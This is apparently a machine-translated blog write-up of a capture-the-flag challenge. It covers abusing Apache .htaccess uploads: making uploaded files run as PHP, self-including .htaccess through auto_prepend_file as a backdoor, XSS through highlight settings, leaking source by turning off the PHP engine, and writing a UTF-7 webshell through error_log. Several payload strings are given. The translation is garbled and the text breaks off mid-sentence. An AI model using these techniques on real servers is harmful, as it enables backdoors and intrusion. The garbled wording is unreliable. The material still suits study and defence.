Shulou(Shulou.com)06/01 Report--

This article will explain in detail how to analyze the security problems caused by users using the principle of .htaccess to tamper with the configuration. The content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have some understanding of the relevant knowledge after reading this article.

Preface

Most of the masters who have done ctf know that htaccess is often used to attack files when uploading files; but only understanding the shallow concept is not feasible in many cases, such as the following question; I will post the source code first; take this example to gain a deeper understanding of .htaccess; enter the world of htaccess

To audit the code first, the code logic is not very difficult; but if you don't have a thorough understanding of .htaccess. It's a bit difficult to make this problem; it's a good one; the server first traverses the directory, then scans the files in the directory, and then deletes them if it's not index.php; then it includes fl3g.php;, and then we pass in the contents of the file and the name of the file, and then we filter the content and name of the file. Finally, we wrap the lines after the contents of the file and add extraneous characters.

Inquiry

What is. Htaccess

The. Htaccess file (or "distributed configuration file"), whose full name is Hypertext Access (hypertext entry). A method of changing configuration for a directory is provided, that is, placing a file containing one or more instructions in a specific document directory to act on this directory and all its subdirectories. As a user, the commands you can use are limited. The administrator can set it through the''AllowOverride''' directive of Apache. To put it briefly, .htaccess is a configuration file in the apache server; only it is responsible for the configuration of web pages under the relevant directory

What can .htaccess do?

What we can do through .htaccess files are: page 301 redirect, customize 404 error page, change file extension, forbid directory list, etc.; here, for example, change file extension; general novice file upload problem; can upload .htaccess; we can write the following content in .htaccess

% 0aSethandler application/x-httpd-php%0a so we upload a file called s1mple; write inside and then upload, the server will parse the s1mple file as php, because the s1mple file we uploaded is in the same directory as the .htaccess file, but the .htaccess file has changed the configuration of our directory and subdirectory; so our s1mple file can be parsed and utilized successfully Or write AddType application/x-httpd-php .jpg; parse the jpg file as php; this is simple; not too much repetition

Research on the advance of .htaccess

Using .htaccess to form a back door

1. File contains; php_value auto_prepend_file + file absolute path (default is the current uploaded directory); look at the code name means to pre-include our specified file; step up: if we include .htaccess files in advance; then the effect is that the malicious code we insert will be arbitrarily included; then what will be the effect? We can construct the following code php_value auto_prepend_file ".htaccess"% 0a# to write malicious code directly into our .htaccess, including directly; let's test it locally; take the above question to test; pass in;? filename=.htaccess&content=php_value%20auto_prepend_fi\% 0ale%20 ".htaccess"% 0a%23\ Let's look at the echo; when we first passed in, we found that phpinfo was not triggered. So what did the server do? Let's open the corresponding folder locally.

It turns out that the first step is to generate .htaccess; it hasn't been preloaded yet, so let's refresh the page and use it successfully; let's take a look at .htaccess and see what's generated in it.

Here we can see the contents clearly; imagine if we are faced with the problem of uploading. And uploaded such content, then you can directly generate a backdoor without passing in other files (tested locally and successfully); if we use this to write a sentence Trojan horse directly, then we can use it directly; it directly includes .htaccess, which causes all files to contain Trojans.

Two images prove that the use is successful; dir can list a lot of sensitive information; code and code ~; buu environment, directly penetrate with this method; the attached figure is as follows:

Xss caused by 2..htaccess

This situation is more interesting; we add this code to our .htaccess; php_value highlight.html'> alert (1); 'and then visit index.php. The success pop-up window is found here.

We can only play once here, because we have a unlink function in our index.php, which can delete non-index.php files in that directory, so our .htaccess is deleted.

Many of the following tests can be used for xss.

(there is also a highlight.string that can also be used as a pop-up window, but what is added here has not been reproduced; the masters can try to do it again.)

After testing, all of the above can use pop-up windows for xss.

Source code disclosure caused by 3.htaccess tampering with engine

To experiment, I delete the highlighted code in this question; so that the source code is not displayed. Here we display the source code by tampering with the server parsing engine, but here we just need to turn off the parsing engine; type the following code in .htaccess

The experiment shows that the code has been shown here; we have deleted the place where the arrow points; it was originally highlight_file (_ _ FILE__), and now the code can be displayed after it is deleted, because we have turned off the processing engine of php so that it does not work, so the source code is shown here. There is also a unlink function in the code, but the refresh code is still not executed because .htaccess still exists, because our code has lost its working engine and will not be parsed; it will not delete our .htaccess code; it can be seen that .htaccess is a magic weapon;!!

4.htaccess redefines the error file and custom include path

This method is also another solution to this problem, which is the standard solution.

First of all, let's explore the situation of custom error reports. We can see that there must be errors in the code, because there is no fl3g.php. Therefore, we modify .htaccess to php_value error_log G:\ phpstudy\ tmp\ fl3g.php here to refresh the page, and then find the error.

Let's take a look at the effect; go to the relevant directory, find fl3g.php, and open it to find that it is indeed an error report.

We basically have the idea now, using error_log custom error record file, write shell; so how to write? Here we think; because there is no fl3g.php file, he will report an error, here we customize an included path, if not, then the error will also be reported, then the server will write two messages to our error file at the same time; let's experiment and find that it is. The reason for using utf7 to encode here is that the contents we write to the error file will be encoded by html, so we use utf7 to encode around it; avoid it from being encoded; the reason for setting the report level to 32767 is to report all possible errors and make sure we can write to Trojans

Now that we have left a message on the server (pictured above), it is time to trigger the Trojan. Then let's start our second step. Because we already have fl3g.php here and will not be deleted, so here we can customize the path that contains our fl3g.php. There is also a question of how our Trojan horse is parsed. So here we need to first verify whether the file has the content of unicode, and then customize the encoding method. The content of the relevant directory file of the php_value zend.script_encoding configuration server is utf7 encoding. Then the inclusion will be identified and decoded accordingly. Finally, the Trojan horse was executed.

So the overall process is: first customize the error log to write the horse, here for comprehensive writing, use the 32767 level of error reporting; then bypass

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.